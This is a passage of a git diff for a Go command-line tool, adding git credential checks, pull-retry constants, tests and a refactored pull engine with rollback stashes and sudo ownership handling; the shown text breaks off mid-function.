@@ -109,7 +109,7 @@ func TestSecurityValidator_ValidateService(t *testing.T) {
ID: "https-health",
Name: "HTTPS Health Check",
Type: "https",
- Target: "https://shared.GetInternalHostname:8443/health",
+ Target: "https://127.0.0.1:8443/health",
Interval: "10s",
Timeout: "3s",
},
diff --git a/pkg/git/constants.go b/pkg/git/constants.go
new file mode 100644
index 000000000..01073a65d
--- /dev/null
+++ b/pkg/git/constants.go
@@ -0,0 +1,25 @@
+// pkg/git/constants.go
+//
+// Centralized constants for git operations.
+// SINGLE SOURCE OF TRUTH per CLAUDE.md P0 Rule #12.
+
+package git
+
+import "time"
+
+const (
+ // GitPullMaxAttempts is the maximum number of retry attempts for transient
+ // git pull failures (HTTP 502/503/504, DNS, timeouts).
+ // RATIONALE: 4 attempts with jittered backoff covers typical CDN/proxy
+ // recovery windows (5-15s) without excessive delay in CI.
+ GitPullMaxAttempts = 4
+
+ // GitPullBaseBackoff is the base duration for retry backoff calculation.
+ // Actual backoff = baseBackoff * attempt + jitter.
+ GitPullBaseBackoff = 2 * time.Second
+
+ // GitPullMaxJitter is the upper bound for random jitter added to backoff.
+ // RATIONALE: Prevents thundering herd when multiple Eos instances
+ // retry against the same git remote simultaneously.
+ GitPullMaxJitter = 1 * time.Second
+)
diff --git a/pkg/git/credentials.go b/pkg/git/credentials.go
new file mode 100644
index 000000000..30b77f06a
--- /dev/null
+++ b/pkg/git/credentials.go
@@ -0,0 +1,213 @@
+// pkg/git/credentials.go
+//
+// Git credential management for HTTPS remotes.
+// Ensures git operations don't block on interactive credential prompts.
+// Guides users through credential setup when credentials are missing.
+
+package git
+
+import (
+ "fmt"
+ "os"
+ "os/exec"
+ "strings"
+
+ "github.com/CodeMonkeyCybersecurity/eos/pkg/constants"
+ "github.com/CodeMonkeyCybersecurity/eos/pkg/eos_io"
+ "github.com/uptrace/opentelemetry-go-extra/otelzap"
+ "go.uber.org/zap"
+)
+
+// CredentialStatus describes the state of git credential configuration.
+type CredentialStatus struct {
+ // HelperConfigured is true if credential.helper is set in git config.
+ HelperConfigured bool
+ // HelperName is the name of the configured helper (e.g., "store", "cache").
+ HelperName string
+ // CredentialsAvailable is true if credentials are stored for the remote host.
+ CredentialsAvailable bool
+ // RemoteRequiresAuth is true if the remote URL uses HTTPS (needs credentials).
+ RemoteRequiresAuth bool
+ // RemoteURL is the resolved remote URL for the repository.
+ RemoteURL string
+}
+
+// CheckCredentials checks if git credentials are configured for the remote
+// in the given repository. Returns a CredentialStatus and a user-friendly
+// error if credentials are missing for an HTTPS remote.
+//
+// This function does NOT prompt the user. It only diagnoses.
+func CheckCredentials(rc *eos_io.RuntimeContext, repoDir string) (*CredentialStatus, error) {
+ logger := otelzap.Ctx(rc.Ctx)
+ status := &CredentialStatus{}
+
+ // Get remote URL
+ remoteCmd := exec.Command("git", "-C", repoDir, "remote", "get-url", "origin")
+ remoteOutput, err := remoteCmd.Output()
+ if err != nil {
+ return status, fmt.Errorf("failed to get remote URL: %w", err)
+ }
+ remoteURL := strings.TrimSpace(string(remoteOutput))
+ status.RemoteURL = remoteURL
+
+ // SSH remotes don't need credential.helper - they use SSH keys
+ if strings.HasPrefix(remoteURL, "git@") || strings.HasPrefix(remoteURL, "ssh://") {
+ logger.Debug("SSH remote detected, credential helper not needed",
+ zap.String("remote", remoteURL))
+ status.RemoteRequiresAuth = false
+ return status, nil
+ }
+
+ // HTTPS remotes need credential configuration
+ if strings.HasPrefix(remoteURL, "https://") || strings.HasPrefix(remoteURL, "http://") {
+ status.RemoteRequiresAuth = true
+ } else {
+ // Unknown scheme - assume no auth needed
+ return status, nil
+ }
+
+ // Check if credential.helper is configured (any scope)
+ helperCmd := exec.Command("git", "-C", repoDir, "config", "credential.helper")
+ helperOutput, err := helperCmd.Output()
+ if err == nil {
+ helper := strings.TrimSpace(string(helperOutput))
+ if helper != "" {
+ status.HelperConfigured = true
+ status.HelperName = helper
+ logger.Debug("Credential helper configured",
+ zap.String("helper", helper))
+ }
+ }
+
+ // If credential.helper is "store", check if credentials file exists
+ if status.HelperConfigured && strings.Contains(status.HelperName, "store") {
+ status.CredentialsAvailable = credentialStoreHasHost(remoteURL)
+ }
+
+ // If credential.helper is configured (even without confirming stored creds),
+ // assume it will handle auth (could be cache, osxkeychain, manager, etc.)
+ if status.HelperConfigured {
+ status.CredentialsAvailable = true
+ }
+
+ if !status.HelperConfigured {
+ logger.Warn("No credential helper configured for HTTPS remote",
+ zap.String("remote", remoteURL))
+ }
+
+ return status, nil
+}
+
+// credentialStoreHasHost checks if ~/.git-credentials contains an entry
+// for the host in the given remote URL. Also checks /root/.git-credentials
+// when running as root.
+func credentialStoreHasHost(remoteURL string) bool {
+ // Extract host from URL
+ host := extractHost(remoteURL)
+ if host == "" {
+ return false
+ }
+
+ // Check common credential store locations
+ paths := []string{}
+
+ if home, err := os.UserHomeDir(); err == nil {
+ paths = append(paths, home+"/.git-credentials")
+ }
+
+ // Also check root's credentials when running as root
+ if os.Getuid() == 0 {
+ paths = append(paths, "/root/.git-credentials")
+ }
+
+ for _, path := range paths {
+ data, err := os.ReadFile(path)
+ if err != nil {
+ continue
+ }
+ if strings.Contains(string(data), host) {
+ return true
+ }
+ }
+
+ return false
+}
+
+// extractHost extracts the hostname from a remote URL.
+func extractHost(remoteURL string) string {
+ // Strip scheme
+ url := remoteURL
+ for _, scheme := range []string{"https://", "http://"} {
+ if strings.HasPrefix(url, scheme) {
+ url = strings.TrimPrefix(url, scheme)
+ break
+ }
+ }
+
+ // Take everything before the first /
+ if idx := strings.Index(url, "/"); idx > 0 {
+ return url[:idx]
+ }
+ return url
+}
+
+// EnsureCredentials checks if credentials are configured for the repository's
+// HTTPS remote. If not, returns an actionable error with setup instructions.
+//
+// This is designed to be called BEFORE git pull to prevent the process from
+// hanging on an interactive credential prompt.
+func EnsureCredentials(rc *eos_io.RuntimeContext, repoDir string) error {
+ logger := otelzap.Ctx(rc.Ctx)
+
+ status, err := CheckCredentials(rc, repoDir)
+ if err != nil {
+ return fmt.Errorf("failed to check credentials: %w", err)
+ }
+
+ // No auth needed (SSH or non-HTTPS remote)
+ if !status.RemoteRequiresAuth {
+ return nil
+ }
+
+ // Credentials are configured - proceed
+ if status.HelperConfigured {
+ logger.Debug("Credentials configured",
+ zap.String("helper", status.HelperName),
+ zap.Bool("credentials_available", status.CredentialsAvailable))
+ return nil
+ }
+
+ remoteURL := status.RemoteURL
+ host := extractHost(remoteURL)
+
+ logger.Warn("No credential helper configured for HTTPS remote",
+ zap.String("remote", remoteURL),
+ zap.String("host", host))
+
+ return fmt.Errorf("git credentials not configured for HTTPS remote %s: "+
+ "run 'sudo git config --global credential.helper store' and configure a token at https://%s/-/user/settings/applications, "+
+ "or switch to SSH with 'sudo git remote set-url origin %s' in %s",
+ remoteURL, host, constants.PrimaryRemoteSSH, repoDir)
+}
+
+// IsInteractive returns true if stdin is connected to a terminal (TTY).
+// Used to decide whether git should be allowed to prompt for credentials.
+func IsInteractive() bool {
+ fi, err := os.Stdin.Stat()
+ if err != nil {
+ return false
+ }
+ // If stdin is a character device (not a pipe/file), it's a TTY
+ return fi.Mode()&os.ModeCharDevice != 0
+}
+
+// GitPullEnv returns environment variables for git pull commands.
+// When running non-interactively (no TTY), sets GIT_TERMINAL_PROMPT=0
+// to prevent git from hanging on credential prompts.
+// When running interactively, allows git to prompt normally.
+func GitPullEnv() []string {
+ if !IsInteractive() {
+ return []string{"GIT_TERMINAL_PROMPT=0"}
+ }
+ return nil
+}
diff --git a/pkg/git/credentials_test.go b/pkg/git/credentials_test.go
new file mode 100644
index 000000000..d9c15380a
--- /dev/null
+++ b/pkg/git/credentials_test.go
@@ -0,0 +1,263 @@
+// pkg/git/credentials_test.go
+//
+// Tests for git credential checking and TTY detection.
+// Unit tests verify credential helper detection, host extraction,
+// and environment variable generation for non-interactive safety.
+
+package git
+
+import (
+ "os"
+ "os/exec"
+ "path/filepath"
+ "testing"
+)
+
+// --- Unit tests: extractHost ---
+
+func TestExtractHost(t *testing.T) {
+ tests := []struct {
+ name string
+ url string
+ wantHost string
+ }{
+ {"https with path", "https://gitea.cybermonkey.sh/cybermonkey/eos.git", "gitea.cybermonkey.sh"},
+ {"https without path", "https://gitea.cybermonkey.sh", "gitea.cybermonkey.sh"},
+ {"https with port", "https://gitea.cybermonkey.sh:443/cybermonkey/eos.git", "gitea.cybermonkey.sh:443"},
+ {"http scheme", "http://example.com/repo.git", "example.com"},
+ {"github", "https://github.com/CodeMonkeyCybersecurity/eos.git", "github.com"},
+ {"no scheme", "gitea.cybermonkey.sh/cybermonkey/eos.git", "gitea.cybermonkey.sh"},
+ {"empty string", "", ""},
+ }
+
+ for _, tt := range tests {
+ t.Run(tt.name, func(t *testing.T) {
+ got := extractHost(tt.url)
+ if got != tt.wantHost {
+ t.Errorf("extractHost(%q) = %q, want %q", tt.url, got, tt.wantHost)
+ }
+ })
+ }
+}
+
+// --- Unit tests: IsInteractive ---
+
+func TestIsInteractive(t *testing.T) {
+ // In test environments, stdin is typically NOT a TTY (piped).
+ // We can't control this, but we can verify the function runs without panic.
+ result := IsInteractive()
+ t.Logf("IsInteractive() = %v (expected false in test environment)", result)
+ // In CI/test, this should be false since stdin is piped
+}
+
+// --- Unit tests: GitPullEnv ---
+
+func TestGitPullEnv(t *testing.T) {
+ env := GitPullEnv()
+ // In test environments (non-interactive), should return GIT_TERMINAL_PROMPT=0
+ // In interactive environments, should return nil
+ interactive := IsInteractive()
+ if interactive {
+ if len(env) != 0 {
+ t.Errorf("GitPullEnv() returned %v for interactive session, want nil", env)
+ }
+ } else {
+ if len(env) == 0 {
+ t.Error("GitPullEnv() returned nil for non-interactive session, want GIT_TERMINAL_PROMPT=0")
+ } else if env[0] != "GIT_TERMINAL_PROMPT=0" {
+ t.Errorf("GitPullEnv()[0] = %q, want GIT_TERMINAL_PROMPT=0", env[0])
+ }
+ }
+}
+
+// --- Unit tests: CheckCredentials ---
+
+func TestCheckCredentials_SSHRemote(t *testing.T) {
+ rc := newTestRC(t)
+ dir := initTestRepo(t, "git@github.com:CodeMonkeyCybersecurity/eos.git")
+
+ status, err := CheckCredentials(rc, dir)
+ if err != nil {
+ t.Fatalf("CheckCredentials failed: %v", err)
+ }
+
+ if status.RemoteRequiresAuth {
+ t.Error("SSH remote should not require auth via credential helper")
+ }
+}
+
+func TestCheckCredentials_SSHSchemeRemote(t *testing.T) {
+ rc := newTestRC(t)
+ dir := initTestRepo(t, "ssh://git@gitea.cybermonkey.sh:9001/cybermonkey/eos.git")
+
+ status, err := CheckCredentials(rc, dir)
+ if err != nil {
+ t.Fatalf("CheckCredentials failed: %v", err)
+ }
+
+ if status.RemoteRequiresAuth {
+ t.Error("SSH scheme remote should not require auth via credential helper")
+ }
+}
+
+func TestCheckCredentials_HTTPSRemote_NoHelper(t *testing.T) {
+ rc := newTestRC(t)
+ dir := initTestRepo(t, "https://gitea.cybermonkey.sh/cybermonkey/eos.git")
+
+ // Ensure no credential helper is configured in the test repo
+ cmd := exec.Command("git", "-C", dir, "config", "--unset", "credential.helper")
+ _ = cmd.Run() // Ignore error if not set
+
+ status, err := CheckCredentials(rc, dir)
+ if err != nil {
+ t.Fatalf("CheckCredentials failed: %v", err)
+ }
+
+ if !status.RemoteRequiresAuth {
+ t.Error("HTTPS remote should require auth")
+ }
+ // In test environment with no global config, helper should not be configured
+ // (unless the test runner has one globally configured)
+ t.Logf("HelperConfigured=%v HelperName=%q", status.HelperConfigured, status.HelperName)
+}
+
+func TestCheckCredentials_HTTPSRemote_WithHelper(t *testing.T) {
+ rc := newTestRC(t)
+ dir := initTestRepo(t, "https://gitea.cybermonkey.sh/cybermonkey/eos.git")
+
+ // Configure credential helper in local repo config
+ cmd := exec.Command("git", "-C", dir, "config", "credential.helper", "store")
+ if out, err := cmd.CombinedOutput(); err != nil {
+ t.Fatalf("failed to set credential.helper: %v\n%s", err, out)
+ }
+
+ status, err := CheckCredentials(rc, dir)
+ if err != nil {
+ t.Fatalf("CheckCredentials failed: %v", err)
+ }
+
+ if !status.RemoteRequiresAuth {
+ t.Error("HTTPS remote should require auth")
+ }
+ if !status.HelperConfigured {
+ t.Error("credential helper should be detected as configured")
+ }
+ if status.HelperName != "store" {
+ t.Errorf("HelperName = %q, want %q", status.HelperName, "store")
+ }
+}
+
+func TestCheckCredentials_NotARepo(t *testing.T) {
+ rc := newTestRC(t)
+ dir := t.TempDir() // no git init
+
+ _, err := CheckCredentials(rc, dir)
+ if err == nil {
+ t.Fatal("expected error for non-repo directory")
+ }
+}
+
+// --- Unit tests: EnsureCredentials ---
+
+func TestEnsureCredentials_SSHRemote(t *testing.T) {
+ rc := newTestRC(t)
+ dir := initTestRepo(t, "ssh://git@gitea.cybermonkey.sh:9001/cybermonkey/eos.git")
+
+ if err := EnsureCredentials(rc, dir); err != nil {
+ t.Errorf("EnsureCredentials should pass for SSH remote, got: %v", err)
+ }
+}
+
+func TestEnsureCredentials_HTTPSWithHelper(t *testing.T) {
+ rc := newTestRC(t)
+ dir := initTestRepo(t, "https://gitea.cybermonkey.sh/cybermonkey/eos.git")
+
+ // Configure credential helper
+ cmd := exec.Command("git", "-C", dir, "config", "credential.helper", "store")
+ if out, err := cmd.CombinedOutput(); err != nil {
+ t.Fatalf("failed to set credential.helper: %v\n%s", err, out)
+ }
+
+ if err := EnsureCredentials(rc, dir); err != nil {
+ t.Errorf("EnsureCredentials should pass with helper configured, got: %v", err)
+ }
+}
+
+func TestEnsureCredentials_HTTPSNoHelper(t *testing.T) {
+ rc := newTestRC(t)
+ dir := initTestRepo(t, "https://gitea.cybermonkey.sh/cybermonkey/eos.git")
+
+ // Ensure no credential helper (use isolated HOME from initTestRepo)
+ cmd := exec.Command("git", "-C", dir, "config", "--unset", "credential.helper")
+ _ = cmd.Run()
+
+ err := EnsureCredentials(rc, dir)
+ // May or may not error depending on global git config of test runner.
+ // If it errors, verify the error message is helpful.
+ if err != nil {
+ errMsg := err.Error()
+ if !containsAll(errMsg, "credential", "HTTPS") {
+ t.Errorf("error should mention credentials and HTTPS, got: %s", errMsg)
+ }
+ if !containsAll(errMsg, "token", "credential.helper") {
+ t.Errorf("error should include remediation steps, got: %s", errMsg)
+ }
+ t.Logf("Got expected credential warning: %s", errMsg[:min(len(errMsg), 100)])
+ }
+}
+
+// --- Unit tests: credentialStoreHasHost ---
+
+func TestCredentialStoreHasHost_FileExists(t *testing.T) {
+ // Create a temporary credentials file
+ dir := t.TempDir()
+ credFile := filepath.Join(dir, ".git-credentials")
+ err := os.WriteFile(credFile, []byte("https://henry:token123@gitea.cybermonkey.sh\n"), 0600)
+ if err != nil {
+ t.Fatal(err)
+ }
+
+ // credentialStoreHasHost uses os.UserHomeDir(), so we can't easily
+ // redirect it to our temp dir in unit tests. Just verify the function
+ // doesn't panic with various inputs.
+ _ = credentialStoreHasHost("https://gitea.cybermonkey.sh/cybermonkey/eos.git")
+ _ = credentialStoreHasHost("https://github.com/org/repo.git")
+ _ = credentialStoreHasHost("")
+}
+
+// --- Helper ---
+
+func containsAll(s string, substrings ...string) bool {
+ for _, sub := range substrings {
+ found := false
+ // Case-insensitive search
+ sl := len(s)
+ subl := len(sub)
+ for i := 0; i <= sl-subl; i++ {
+ match := true
+ for j := 0; j < subl; j++ {
+ sc := s[i+j]
+ subc := sub[j]
+ // Simple ASCII lowercase comparison
+ if sc >= 'A' && sc <= 'Z' {
+ sc += 'a' - 'A'
+ }
+ if subc >= 'A' && subc <= 'Z' {
+ subc += 'a' - 'A'
+ }
+ if sc != subc {
+ match = false
+ break
+ }
+ }
+ if match {
+ found = true
+ break
+ }
+ }
+ if !found {
+ return false
+ }
+ }
+ return true
+}
diff --git a/pkg/git/operations.go b/pkg/git/operations.go
index 77e4b3e1f..5dae395bd 100644
--- a/pkg/git/operations.go
+++ b/pkg/git/operations.go
@@ -6,17 +6,62 @@
package git
import (
+ "bytes"
+ cryptorand "crypto/rand"
"fmt"
+ "math/big"
"os"
"os/exec"
"path/filepath"
+ "strconv"
"strings"
+ "syscall"
+ "time"
"github.com/CodeMonkeyCybersecurity/eos/pkg/eos_io"
"github.com/uptrace/opentelemetry-go-extra/otelzap"
"go.uber.org/zap"
)
+var (
+ gitPullRetrySleep = time.Sleep
+ // runGitPullAttempt executes a single git pull attempt.
+ // FIX: Previously set Stderr AND called CombinedOutput(), which panics with
+ // "exec: Stderr already set" (Go's exec package disallows this).
+ // Solution: Use a shared buffer for both Stdout and Stderr (same as CombinedOutput
+ // but without the internal conflict). When interactive, also tee stdin.
+ // Reference: https://pkg.go.dev/os/exec#Cmd.CombinedOutput
+ runGitPullAttempt = func(repoDir, branch string, autostash bool, interactive bool, extraEnv []string) ([]byte, error) {
+ args := []string{"-C", repoDir, "pull"}
+ if autostash {
+ args = append(args, "--autostash")
+ }
+ args = append(args, "origin", branch)
+ // #nosec G204 -- args are assembled from fixed tokens plus validated branch/repo inputs.
+ pullCmd := exec.Command("git", args...)
+ if len(extraEnv) > 0 {
+ pullCmd.Env = append(os.Environ(), extraEnv...)
+ }
+
+ // Capture combined stdout+stderr into a single buffer.
+ // This is what CombinedOutput() does internally, but we do it manually
+ // so we can also set Stdin for interactive sessions without conflict.
+ var buf bytes.Buffer
+ pullCmd.Stdout = &buf
+ pullCmd.Stderr = &buf
+ if interactive {
+ pullCmd.Stdin = os.Stdin
+ }
+ err := pullCmd.Run()
+ return buf.Bytes(), err
+ }
+)
+
+const (
+ gitPullFailureReasonPermanent = "permanent"
+ gitPullFailureReasonUnknown = "unknown"
+)
+
// RepositoryState represents the state of a git repository
type RepositoryState struct {
IsRepository bool
@@ -107,8 +152,7 @@ func CheckRepositoryState(rc *eos_io.RuntimeContext, repoDir string) (*Repositor
// GetCurrentCommit returns the current git commit hash
func GetCurrentCommit(rc *eos_io.RuntimeContext, repoDir string) (string, error) {
- commitCmd := exec.Command("git", "-C", repoDir, "rev-parse", "HEAD")
- commitOutput, err := commitCmd.Output()
+ commitOutput, err := runGitOutput(repoDir, "rev-parse", "HEAD")
if err != nil {
return "", fmt.Errorf("failed to get current commit: %w", err)
}
@@ -116,296 +160,594 @@ func GetCurrentCommit(rc *eos_io.RuntimeContext, repoDir string) (string, error)
return strings.TrimSpace(string(commitOutput)), nil
}
-// PullLatestCode pulls the latest code from the remote repository
-// Uses --autostash to handle uncommitted changes safely
-// SECURITY: Verifies remote URL is trusted before pulling
-func PullLatestCode(rc *eos_io.RuntimeContext, repoDir, branch string) error {
- logger := otelzap.Ctx(rc.Ctx)
+func runGitOutput(repoDir string, args ...string) ([]byte, error) {
+ // #nosec G204 -- args are assembled from fixed tokens plus validated inputs
+ cmd := exec.Command("git", append([]string{"-C", repoDir}, args...)...)
+ return cmd.Output()
+}
- logger.Info("Pulling latest changes from git repository",
- zap.String("repo", repoDir),
- zap.String("branch", branch))
+func runGitCombinedOutput(repoDir string, args ...string) ([]byte, error) {
+ // #nosec G204 -- args are assembled from fixed tokens plus validated inputs
+ cmd := exec.Command("git", append([]string{"-C", repoDir}, args...)...)
+ return cmd.CombinedOutput()
+}
- // SECURITY CHECK: Verify remote is trusted BEFORE pulling
- if err := VerifyTrustedRemote(rc, repoDir); err != nil {
- return err // Error already includes detailed message
+func shortRef(ref string) string {
+ if ref == "" {
+ return ""
+ }
+ if len(ref) <= 8 {
+ return ref
}
+ return ref[:8] + "..."
+}
- // Use --autostash to handle uncommitted changes automatically
- // This is safer than manual stash management
- pullCmd := exec.Command("git", "-C", repoDir, "pull", "--autostash", "origin", branch)
- pullOutput, err := pullCmd.CombinedOutput()
+// createRollbackStash creates a stash snapshot suitable for rollback recovery.
+// It includes untracked files to prevent false-positive "has changes" states
+// where stash creation appears to succeed but no stash ref exists.
+func createRollbackStash(rc *eos_io.RuntimeContext, repoDir string) (string, error) {
+ logger := otelzap.Ctx(rc.Ctx)
+
+ statusOutput, err := runGitOutput(repoDir, "status", "--porcelain")
if err != nil {
- return fmt.Errorf("git pull failed: %w\nOutput: %s",
- err, strings.TrimSpace(string(pullOutput)))
+ return "", fmt.Errorf("failed to check git status: %w", err)
+ }
+ if len(statusOutput) == 0 {
+ logger.Debug("No uncommitted changes, no stash needed")
+ return "", nil
}
- logger.Debug("Git pull completed",
- zap.String("output", strings.TrimSpace(string(pullOutput))))
+ logger.Info("Uncommitted changes detected, creating stash for rollback safety",
+ zap.String("event", "self_update.git.stash_create"),
+ zap.String("message", "eos self-update auto-stash"),
+ zap.Bool("include_untracked", true))
- return nil
+ stashOutput, err := runGitCombinedOutput(repoDir, "stash", "push", "--include-untracked", "-m", "eos self-update auto-stash")
+ if err != nil {
+ return "", fmt.Errorf("failed to create stash: %w\nOutput: %s",
+ err, strings.TrimSpace(string(stashOutput)))
+ }
+
+ stashOutputStr := strings.TrimSpace(string(stashOutput))
+ logger.Debug("Stash command output", zap.String("output", stashOutputStr))
+
+ if strings.Contains(stashOutputStr, "No local changes to save") {
+ // Defensive fallback: treat as no-op instead of hard-failing stash ref resolution.
+ logger.Info("Stash reported no local changes; continuing without stash ref")
+ return "", nil
+ }
+
+ // Read the stash commit directly from refs/stash to avoid reflog-index assumptions.
+ stashRefOutput, err := runGitOutput(repoDir, "rev-parse", "--verify", "refs/stash")
+ if err != nil {
+ return "", fmt.Errorf("failed to get stash ref after creating stash: %w\n"+
+ "CRITICAL: Stash may exist but ref could not be retrieved.\n"+
+ "Manual recovery:\n"+
+ " git -C %s stash list\n"+
+ " git -C %s stash apply stash@{0}",
+ err, repoDir, repoDir)
+ }
+
+ stashRef := strings.TrimSpace(string(stashRefOutput))
+ logger.Info("Stash created successfully for rollback safety",
+ zap.String("event", "self_update.git.stash_created"),
+ zap.String("ref", shortRef(stashRef)),
+ zap.String("symbolic", "refs/stash"))
+ return stashRef, nil
}
-// PullWithVerification pulls code and returns whether anything actually changed
-// SECURITY: Verifies remote URL before pulling, verifies commit signatures after pulling
-func PullWithVerification(rc *eos_io.RuntimeContext, repoDir, branch string) (bool, error) {
+func normalizeRepositoryOwnershipForSudoUser(rc *eos_io.RuntimeContext, repoDir string) error {
logger := otelzap.Ctx(rc.Ctx)
- // Get commit before pull
- commitBefore, err := GetCurrentCommit(rc, repoDir)
+ if os.Geteuid() != 0 {
+ return nil
+ }
+
+ sudoUID, sudoGID, err := resolveSudoOwnership()
if err != nil {
- return false, fmt.Errorf("failed to get commit before pull: %w", err)
+ return err
+ }
+ if sudoUID == "" || sudoGID == "" {
+ return nil
}
- // Pull changes (includes remote verification)
- if err := PullLatestCode(rc, repoDir, branch); err != nil {
- return false, err
+ gitDir := filepath.Join(repoDir, ".git")
+ if _, err := os.Stat(gitDir); err != nil {
+ return fmt.Errorf("cannot stat git dir for ownership normalization: %w", err)
+ }
+ needsNormalization, err := repositoryOwnershipNeedsNormalization(gitDir, sudoUID, sudoGID)
+ if err != nil {
+ return fmt.Errorf("failed to inspect git ownership for normalization: %w", err)
+ }
+ if !needsNormalization {
+ logger.Debug("Git ownership already normalized for sudo user",
+ zap.String("event", "self_update.git.ownership_already_normalized"),
+ zap.String("git_dir", gitDir),
+ zap.String("uid", sudoUID),
+ zap.String("gid", sudoGID))
+ return nil
}
- // Get commit after pull
- commitAfter, err := GetCurrentCommit(rc, repoDir)
+ // #nosec G204 -- sudoUID/sudoGID validated as integers above
+ output, err := exec.Command("chown", "-R", fmt.Sprintf("%s:%s", sudoUID, sudoGID), gitDir).CombinedOutput()
if err != nil {
- return false, fmt.Errorf("failed to get commit after pull: %w", err)
+ return fmt.Errorf("failed to normalize git ownership to %s:%s: %w\nOutput: %s",
+ sudoUID, sudoGID, err, strings.TrimSpace(string(output)))
}
- codeChanged := commitBefore != commitAfter
+ logger.Debug("Normalized .git ownership for sudo user",
+ zap.String("event", "self_update.git.ownership_normalized"),
+ zap.String("git_dir", gitDir),
+ zap.String("uid", sudoUID),
+ zap.String("gid", sudoGID))
+ return nil
+}
- if !codeChanged {
- logger.Info("Already on latest version",
- zap.String("commit", commitAfter[:8]))
- return false, nil
+func resolveSudoOwnership() (string, string, error) {
+ sudoUID := strings.TrimSpace(os.Getenv("SUDO_UID"))
+ sudoGID := strings.TrimSpace(os.Getenv("SUDO_GID"))
+ if sudoUID == "" || sudoGID == "" {
+ return "", "", nil
}
- logger.Info("Updates pulled",
- zap.String("from", commitBefore[:8]),
- zap.String("to", commitAfter[:8]))
-
- // SECURITY CHECK: Verify GPG signatures on new commits
- results, err := VerifyCommitChain(rc, repoDir, commitBefore, commitAfter)
- if err != nil {
- logger.Error("Commit signature verification failed", zap.Error(err))
- // Don't fail update for unsigned commits (yet), just warn
- // This will be enforced when GPG signing is standard practice
+ if _, err := strconv.Atoi(sudoUID); err != nil {
+ return "", "", fmt.Errorf("invalid SUDO_UID %q: %w", sudoUID, err)
+ }
+ if _, err := strconv.Atoi(sudoGID); err != nil {
+ return "", "", fmt.Errorf("invalid SUDO_GID %q: %w", sudoGID, err)
}
- // Log warnings from signature verification
- for _, result := range results {
- for _, warning := range result.Warnings {
- logger.Warn("SECURITY WARNING", zap.String("warning", warning))
+ return sudoUID, sudoGID, nil
+}
+
+func repositoryOwnershipNeedsNormalization(rootPath, wantUID, wantGID string) (bool, error) {
+ return firstOwnershipMismatch(rootPath, wantUID, wantGID)
+}
+
+func firstOwnershipMismatch(rootPath, wantUID, wantGID string) (bool, error) {
+ var mismatch bool
+ stopWalk := fmt.Errorf("ownership_mismatch_detected")
+
+ err := filepath.Walk(rootPath, func(path string, info os.FileInfo, walkErr error) error {
+ if walkErr != nil {
+ return walkErr
+ }
+ stat, ok := info.Sys().(*syscall.Stat_t)
+ if !ok {
+ return fmt.Errorf("missing stat metadata for %s", path)
}
+ if strconv.FormatUint(uint64(stat.Uid), 10) != wantUID || strconv.FormatUint(uint64(stat.Gid), 10) != wantGID {
+ mismatch = true
+ return stopWalk
+ }
+ return nil
+ })
+ if err != nil && err != stopWalk {
+ return false, err
}
- return true, nil
+ return mismatch, nil
}
-// PullWithStashTracking pulls code with manual stash management for rollback safety
-// P0-2 FIX: Returns stash ref so rollback can verify safe to reset and restore changes
-// SECURITY: Verifies remote URL before pulling, verifies commit signatures after pulling
-//
-// Returns:
-// - codeChanged: true if commits changed, false if already up-to-date
-// - stashRef: full SHA of stash (e.g., "abc123def...") or empty string if no stash created
-// - error: non-nil if operation failed
-func PullWithStashTracking(rc *eos_io.RuntimeContext, repoDir, branch string) (codeChanged bool, stashRef string, err error) {
+// PullOptions controls pull behavior for self-update and other git consumers.
+type PullOptions struct {
+ VerifyRemote bool
+ FailOnMissingHTTPSCredentials bool
+ TrackRollbackStash bool
+ VerifyCommitSignatures bool
+ NormalizeOwnershipForSudo bool
+ RecoverMergeConflicts bool
+ FetchFirst bool
+ Autostash bool
+}
+
+// PullResult captures the state transition of a pull operation.
+type PullResult struct {
+ CodeChanged bool
+ StashRef string
+ CommitBefore string
+ CommitAfter string
+ RemoteCommit string
+ PullOutput string
+}
+
+// PullRepository is the single pull engine used by self-update and tests.
+func PullRepository(rc *eos_io.RuntimeContext, repoDir, branch string, options PullOptions) (*PullResult, error) {
logger := otelzap.Ctx(rc.Ctx)
+ result := &PullResult{}
- logger.Info("Pulling latest changes with stash tracking for rollback safety",
+ logger.Info("Pulling latest changes from git repository",
+ zap.String("event", "self_update.git.pull.start"),
zap.String("repo", repoDir),
- zap.String("branch", branch))
-
- // RESILIENCE: Check for and recover from existing merge conflicts FIRST
- // This prevents the "needs merge" error that blocks stash operations
- hasConflicts, conflictedFiles, err := HasMergeConflicts(rc, repoDir)
- if err != nil {
- return false, "", fmt.Errorf("failed to check for merge conflicts: %w", err)
+ zap.String("branch", branch),
+ zap.Bool("track_stash", options.TrackRollbackStash),
+ zap.Bool("verify_signatures", options.VerifyCommitSignatures),
+ zap.Bool("fetch_first", options.FetchFirst))
+
+ if options.NormalizeOwnershipForSudo {
+ if ownErr := normalizeRepositoryOwnershipForSudoUser(rc, repoDir); ownErr != nil {
+ logger.Warn("Could not normalize git ownership before update",
+ zap.Error(ownErr),
+ zap.String("repo", repoDir))
+ }
+ defer func() {
+ if ownErr := normalizeRepositoryOwnershipForSudoUser(rc, repoDir); ownErr != nil {
+ logger.Warn("Could not normalize git ownership after update",
+ zap.Error(ownErr),
+ zap.String("repo", repoDir))
+ }
+ }()
}
- if hasConflicts {
- logger.Warn("Repository has existing merge conflicts, attempting auto-recovery",
- zap.Strings("files", conflictedFiles))
-
- if err := RecoverFromMergeConflicts(rc, repoDir); err != nil {
- return false, "", fmt.Errorf("repository has unresolved merge conflicts: %w\n\n"+
- "Conflicted files: %v\n\n"+
- "Manual recovery required:\n"+
- " cd %s\n"+
- " git status # See conflict details\n"+
- " git merge --abort # Abort the merge\n"+
- " # OR: git reset --hard HEAD # Discard all changes\n"+
- " # Then re-run the update",
- err, conflictedFiles, repoDir)
+ if options.RecoverMergeConflicts {
+ hasConflicts, conflictedFiles, err := HasMergeConflicts(rc, repoDir)
+ if err != nil {
+ return nil, fmt.Errorf("failed to check for merge conflicts: %w", err)
}
- logger.Info("Successfully recovered from merge conflicts, proceeding with update")
+ if hasConflicts {
+ logger.Warn("Repository has existing merge conflicts, attempting auto-recovery",
+ zap.Strings("files", conflictedFiles))
+
+ if err := RecoverFromMergeConflicts(rc, repoDir); err != nil {
+ return nil, fmt.Errorf("repository has unresolved merge conflicts: %w\n\n"+
+ "Conflicted files: %v\n\n"+
+ "Manual recovery required:\n"+
+ " cd %s\n"+
+ " git status # See conflict details\n"+
+ " git merge --abort # Abort the merge\n"+
+ " # OR: git reset --hard HEAD # Discard all changes\n"+
+ " # Then re-run the update",
+ err, conflictedFiles, repoDir)
+ }
+
+ logger.Info("Successfully recovered from merge conflicts, proceeding with update")
